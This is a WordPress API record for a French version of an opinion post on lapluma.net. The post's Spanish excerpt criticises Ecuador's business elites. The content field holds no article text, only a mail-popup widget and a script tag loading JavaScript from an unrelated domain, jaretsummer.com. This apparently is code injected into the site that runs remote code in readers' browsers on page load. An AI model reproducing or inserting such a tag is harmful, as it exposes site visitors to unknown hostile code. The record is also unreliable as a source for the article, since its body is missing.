{"id":17293,"date":"2020-03-11T18:23:18","date_gmt":"2020-03-11T18:23:18","guid":{"rendered":"http:\/\/www.lapluma.net\/?p=17293"},"modified":"2020-03-11T18:25:39","modified_gmt":"2020-03-11T18:25:39","slug":"ecuador-necesidad-de-un-empresariado-moderno","status":"publish","type":"post","link":"https:\/\/www.lapluma.net\/fr\/2020\/03\/11\/ecuador-necesidad-de-un-empresariado-moderno\/","title":{"rendered":"Necesidad de un empresariado moderno"},"content":{"rendered":"<p>&nbsp;<\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hoy ni siquiera se admiten las referencias sobre ese per\u00edodo que las instituciones internacionales resaltan por sus logros tanto econ\u00f3micos como sociales. Es indudable que esas elites son corresponsables del desastre econ\u00f3mico actual del pa\u00eds.<\/p>\n","protected":false},"author":8,"featured_media":17295,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[5],"tags":[8401,138,46,8400,7108],"coauthors":[257],"class_list":["post-17293","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-editoriales-y-opiniones","tag-alalc-y-pacto-andino","tag-analisis","tag-ecuador","tag-empresariado-ecuatoriano","tag-modelo-neoliberal-empresarial"],"translation":{"provider":"WPGlobus","version":"2.12.2","language":"fr","enabled_languages":["es","fr"],"languages":{"es":{"title":true,"content":true,"excerpt":true},"fr":{"title":false,"content":true,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/17293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/comments?post=17293"}],"version-history":[{"count":3,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/17293\/revisions"}],"predecessor-version":[{"id":17298,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/17293\/revisions\/17298"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media\/17295"}],"wp:attachment":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media?parent=17293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/categories?post=17293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/tags?post=17293"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/coauthors?post=17293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}